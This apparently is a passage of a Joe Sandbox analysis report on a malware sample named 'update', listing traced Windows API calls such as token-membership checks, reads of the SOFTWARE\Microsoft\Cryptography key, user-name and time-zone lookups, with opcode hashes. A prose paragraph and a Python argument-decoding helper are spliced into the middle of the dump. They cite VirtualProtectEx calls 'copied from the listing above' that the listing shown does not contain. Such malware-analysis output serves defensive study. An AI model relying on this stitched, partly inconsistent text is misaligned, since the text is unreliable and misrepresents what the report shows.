                                                                                                            • Instruction ID: e366e1409ee1fa5a5f821a9877603b5f9982b986e126c00f549b2b56891f5eda
                                                                                                            • Opcode Fuzzy Hash: 24ee2e3d089a4123137fec0d63f5aa274cdf28bd72bc079d480bb61aa69dcfdb
                                                                                                            • Instruction Fuzzy Hash: FA215C71740611AFE7589F18CC85F96B7A5FF48320F298228E969973D1DA34A8118BD4
                                                                                                            APIs
                                                                                                            • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407DD2), ref: 00407D95
                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407DA8
                                                                                                            • FreeSid.ADVAPI32(00000000,00407DD9), ref: 00407DCC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AccountCheckFreeLookupMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 1602037265-0
                                                                                                            • Opcode ID: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
                                                                                                            • Instruction ID: 27b9dc68911105edb543898119344a1168ea53adb1432c2ff39c990f87532faf
                                                                                                            • Opcode Fuzzy Hash: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
                                                                                                            • Instruction Fuzzy Hash: 0E21B575A04209AFDB41CBA8DC51BEFB7F8EB08700F104466EA14E7290E775AA008BA5
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNEL32(000000FF,00000000,?,00003000,00000004,0060075E,00603274), ref: 00602449
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2483343238.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_600000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID: Hrw.
                                                                                                            • API String ID: 4275171209-2486825230
                                                                                                            • Opcode ID: 0661ded0db80fc2c3938ef5cd021da6bf71590ffc0b1c3290cc8fe0ecf141f03
                                                                                                            • Instruction ID: f810dedf99d5b0aae3d782746b9875fda20748e19ad253c0f87b71218621f5fc
                                                                                                            • Opcode Fuzzy Hash: 0661ded0db80fc2c3938ef5cd021da6bf71590ffc0b1c3290cc8fe0ecf141f03
                                                                                                            • Instruction Fuzzy Hash: 8FE092F28893C49FDF664F108C957C83B61BF1A355F140186DE988A2D2D2700A01CB25
                                                                                                            APIs
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,0041688C,?,-00000001,?,?,?,00416B8B,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4), ref: 004167F2
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeInformationStringTimeZone
                                                                                                            • String ID: UTC+
                                                                                                            • API String ID: 3683333525-3251258214
                                                                                                            • Opcode ID: 75489bee9fa3b738de1427028be95b4ab5cbd00bc7b029fff02a4e26b45979e0
                                                                                                            • Instruction ID: 38205c10b50273b6ed0f177ed7b00506e95897eba74a112c127affbdf728c15b
                                                                                                            • Opcode Fuzzy Hash: 75489bee9fa3b738de1427028be95b4ab5cbd00bc7b029fff02a4e26b45979e0
                                                                                                            • Instruction Fuzzy Hash: FB215170B047149FDB55DB698C41B9AB6FA9B8D300F1181B9B50CE3292D7389E458A16
                                                                                                            APIs
                                                                                                            • SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            Strings
                                                                                                            • SOFTWARE\Microsoft\Cryptography, xrefs: 0040415D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocString
                                                                                                            • String ID: SOFTWARE\Microsoft\Cryptography
                                                                                                            • API String ID: 2525500382-1514646153
                                                                                                            • Opcode ID: 76b0c5c92c78ac420becf6784fc6a1da342b91989b07b055a819ce3e10a128ad
                                                                                                            • Instruction ID: b7488d83487bcecb75417ccbdbd58e5acfbbdb6a2dc67c9614fc1c7d46415314
                                                                                                            • Opcode Fuzzy Hash: 76b0c5c92c78ac420becf6784fc6a1da342b91989b07b055a819ce3e10a128ad
                                                                                                            • Instruction Fuzzy Hash: D2D012F42006025AD7488E29855593B776E5BD1700328867EA101AF2C4DB39E841DB38
                                                                                                            APIs
                                                                                                              • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                              • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                              • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                              • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,004020D8), ref: 00401FA7
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0041C5B4,004020DF), ref: 004020D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2227675388-0
                                                                                                            • Opcode ID: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                                                            • Instruction ID: 60aaef5d71d1198278099ac2c9ce8b9a20775f5f033974ed56173d7c89f55220
                                                                                                            • Opcode Fuzzy Hash: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
                                                                                                            • Instruction Fuzzy Hash: DA41CDB1A813019FD714CF29DDC56AABBA1EB59318B24C27FD505E77E1E378A841CB08
                                                                                                            APIs
                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
                                                                                                            • FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CheckFreeMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3914140973-0
                                                                                                            • Opcode ID: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
                                                                                                            • Instruction ID: b2bf85b2e2b23abc2f4a0e5b7d3564ce2fd94028ae90e1c3f906036a39e7bd64
                                                                                                            • Opcode Fuzzy Hash: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
                                                                                                            • Instruction Fuzzy Hash: 97216F75A48348BEE701CBA8CC45FAE77FCEB09704F4084B2F510E3291D375AA08875A
                                                                                                            APIs
                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
                                                                                                            • FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CheckFreeMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3914140973-0
                                                                                                            • Opcode ID: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
                                                                                                            • Instruction ID: 07ef963ec0b68deb3fcaff7dc025a93d4964a205a3b7442176a44215fb39e405
                                                                                                            • Opcode Fuzzy Hash: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
                                                                                                            • Instruction Fuzzy Hash: B6215E75A48248BEE701CBA8DC81FAE77F8EB09700F5085B2F510E36E1D375AA098759
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407642
                                                                                                            • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 00407669
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocOpenQueryStringValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139485348-0
                                                                                                            • Opcode ID: fe58c2676ed98402a924e622f15a72af40503da2610d54ccfcf300c1ae47a28e
                                                                                                            • Instruction ID: 85569b86d54529dfd8c79574c565d9cfa8ba7989ecb8e03db7b7756a239e94ff
                                                                                                            • Opcode Fuzzy Hash: fe58c2676ed98402a924e622f15a72af40503da2610d54ccfcf300c1ae47a28e
                                                                                                            • Instruction Fuzzy Hash: 9B210A71A44208AFD700EB99CD82EEEB7FCEF48704F5040B6B519E72A1D774AE448B65
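
The hex arguments in these API bullets (the VirtualProtectEx and VirtualAllocEx calls in the 00600000 region, and the RegOpenKeyExW call that follows the SOFTWARE\Microsoft\Cryptography string allocation) are easier to triage once they are mapped back to their Windows SDK names. The helper below is an added example, not part of the Joe Sandbox report or of the sample: it parses the bullet lines as printed in this listing and decodes the flag and handle arguments. Argument positions are assumed from the documented prototypes of the three functions; a "?" is the sandbox's marker for a value it could not resolve and is left undecoded. Note that the listing shows the hProcess argument as 000000FF, which is not the documented 0xFFFFFFFF GetCurrentProcess() pseudo-handle, so the decoder reports it as a raw value rather than guessing. The input lines are copied from the listing above.

```python
import re

# Regex for one "APIs" bullet from the Joe Sandbox IDA plugin listing, e.g.
#   VirtualAllocEx.KERNEL32(000000FF,00000000,?,00003000,00000004,0060075E,00603274), ref: 00602449
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Well-known Win32 constants from the Windows SDK headers (not from the report).
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET"}
PAGE_PROT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}
HKEYS = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
}
KEY_READ, KEY_ALL_ACCESS = 0x20019, 0xF003F
CURRENT_PROCESS = 0xFFFFFFFF  # (HANDLE)-1, the 32-bit GetCurrentProcess() pseudo-handle

# Argument slots to decode, by documented prototype position (0-based). Assumption:
# the sandbox prints arguments in prototype order.
DECODERS = {
    "VirtualAllocEx": {0: "hProcess", 3: "flAllocationType", 4: "flProtect"},
    "VirtualProtectEx": {0: "hProcess", 3: "flNewProtect"},
    "RegOpenKeyExW": {0: "hKey", 3: "samDesired"},
}


def decode_arg(name, value):
    """Map one hex argument to its SDK name; fall back to the raw hex value."""
    if name == "hProcess":
        return "GetCurrentProcess()" if value == CURRENT_PROCESS else f"0x{value:X}"
    if name == "flAllocationType":
        return "|".join(n for bit, n in MEM_FLAGS.items() if value & bit) or f"0x{value:X}"
    if name in ("flProtect", "flNewProtect"):
        return PAGE_PROT.get(value, f"0x{value:X}")
    if name == "hKey":
        return HKEYS.get(value, f"0x{value:X}")
    if name == "samDesired":
        return {KEY_READ: "KEY_READ", KEY_ALL_ACCESS: "KEY_ALL_ACCESS"}.get(value, f"0x{value:X}")
    return f"0x{value:X}"


def parse_api_line(line):
    """Parse one API bullet; returns None for headers and other non-API lines."""
    m = API_LINE.search(line)
    if not m:
        return None
    raw = [a.strip() for a in m.group("args").split(",")]
    decoded = {}
    for idx, name in DECODERS.get(m.group("api"), {}).items():
        # "?" marks a value the sandbox could not resolve; only decode clean hex.
        if idx < len(raw) and re.fullmatch(r"[0-9A-Fa-f]+", raw[idx]):
            decoded[name] = decode_arg(name, int(raw[idx], 16))
    return {"api": m.group("api"), "module": m.group("module"),
            "ref": m.group("ref"), "raw": raw, "decoded": decoded}


def summarize(lines):
    """One readable line per API call, suitable for a triage note."""
    out = []
    for line in lines:
        rec = parse_api_line(line)
        if rec is None:
            continue
        args = ", ".join(f"{k}={v}" for k, v in rec["decoded"].items()) or "no decoded args"
        out.append(f"{rec['api']} @ {rec['ref']}: {args}")
    return out


# Lines copied from the listing above; the only input this example needs.
SAMPLE_LINES = [
    "• VirtualProtectEx.KERNEL32(000000FF,?,?,00000002,?), ref: 00600E47",
    "• VirtualAllocEx.KERNEL32(000000FF,00000000,?,00003000,00000004,0060075E,00603274), ref: 00602449",
    "  • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\\Microsoft\\Cryptography,?), ref: 0040415E",
    "• RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407642",
    "Memory Dump Source",
]

if __name__ == "__main__":
    for s in summarize(SAMPLE_LINES):
        print(s)
```

On the listing's own lines this yields MEM_COMMIT|MEM_RESERVE with PAGE_READWRITE for the VirtualAllocEx call, PAGE_READONLY for the second VirtualProtectEx call, and HKEY_LOCAL_MACHINE with KEY_READ for the RegOpenKeyExW call that follows the SOFTWARE\Microsoft\Cryptography allocation; the value name passed to RegQueryValueExW is unresolved in the report, so the decoder does not name it.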
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 00403479
                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 004034AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1404682716-0
                                                                                                            • Opcode ID: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
                                                                                                            • Instruction ID: 3efb88752543cb7b7411b8850ba760202313331cae5217d67b69a3078a3e17bb
                                                                                                            • Opcode Fuzzy Hash: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
                                                                                                            • Instruction Fuzzy Hash: 772162709002408BDB229F6684847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 00403479
                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 004034AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1404682716-0
                                                                                                            • Opcode ID: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
                                                                                                            • Instruction ID: a7f10c8a2f0efa7893578dab7d1fe92da90b98ef6ff2cf319ec6d8299990f2f9
                                                                                                            • Opcode Fuzzy Hash: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
                                                                                                            • Instruction Fuzzy Hash: 922132709002408FDB229F6584847567FA9AF49316F1585BBE844AE2D6D77CCAC0C79D
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 00403479
                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,00418717,00000000), ref: 004034AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1404682716-0
                                                                                                            • Opcode ID: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
                                                                                                            • Instruction ID: 9b75380a0c1bb1c5ffdc64597b03c40b9c34cb72d282d073c18e6e74c6ec6d76
                                                                                                            • Opcode Fuzzy Hash: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
                                                                                                            • Instruction Fuzzy Hash: F42141709002408BDB229F6684847567FA9AF49316F2585BBE844AE2C6D77CCAC0CB9D
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406EC8
                                                                                                            • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFreeOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 967375698-0
                                                                                                            • Opcode ID: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
                                                                                                            • Instruction ID: 95dba4e9abc9c412b13e6587c625634e660d61312d90d7235186b1c7fae4ad03
                                                                                                            • Opcode Fuzzy Hash: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
                                                                                                            • Instruction Fuzzy Hash: DB114970600209AFD700EF98D992ADEBBFCEF48704F4000B6B508E7291E774AB448BA5
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406EC8
                                                                                                            • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFreeOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 967375698-0
                                                                                                            • Opcode ID: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
                                                                                                            • Instruction ID: d6839de15ce0d986496e2f56cedbfcdd5c795bc72117923b9a37f873fbd9eab1
                                                                                                            • Opcode Fuzzy Hash: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
                                                                                                            • Instruction Fuzzy Hash: E0111971640209AFD700EB99DD86EDEBBFCEF48704F5000B6B508E7291DB74AB448A65
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 2087232378-0
                                                                                                            • Opcode ID: 3a030dae07bd12be1e8916226aea606fe10224b866e5fde08d2ce5627efe4e03
                                                                                                            • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                                                                                                            • Opcode Fuzzy Hash: 3a030dae07bd12be1e8916226aea606fe10224b866e5fde08d2ce5627efe4e03
                                                                                                            • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocAttributesFileFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 2634384563-0
                                                                                                            • Opcode ID: 8810337ccaa0ea54d61b76612c76d4f3deadb12b9a49095d69064cceecd31e12
                                                                                                            • Instruction ID: 455f119eb2bdff77f9424d14ab95cdd3c78d1bf311641bba7c090798075f41e3
                                                                                                            • Opcode Fuzzy Hash: 8810337ccaa0ea54d61b76612c76d4f3deadb12b9a49095d69064cceecd31e12
                                                                                                            • Instruction Fuzzy Hash: 3CF0A070504208AFC301EB65CC4289D7BECEB49B103A10577F410E3690E734BF009525
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041874E,?), ref: 0040660D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2645101109-0
                                                                                                            • Opcode ID: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
                                                                                                            • Instruction ID: 5a5990060c673b8f00593b581c9a0ee3644ab744bab1f058c1932740bd518d27
                                                                                                            • Opcode Fuzzy Hash: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
                                                                                                            • Instruction Fuzzy Hash: 1BE0DFB12083424FC3119BA8D880AA53BE49F49300F044876B8D5C72E1FE35CE248753
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041874E,?), ref: 0040660D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
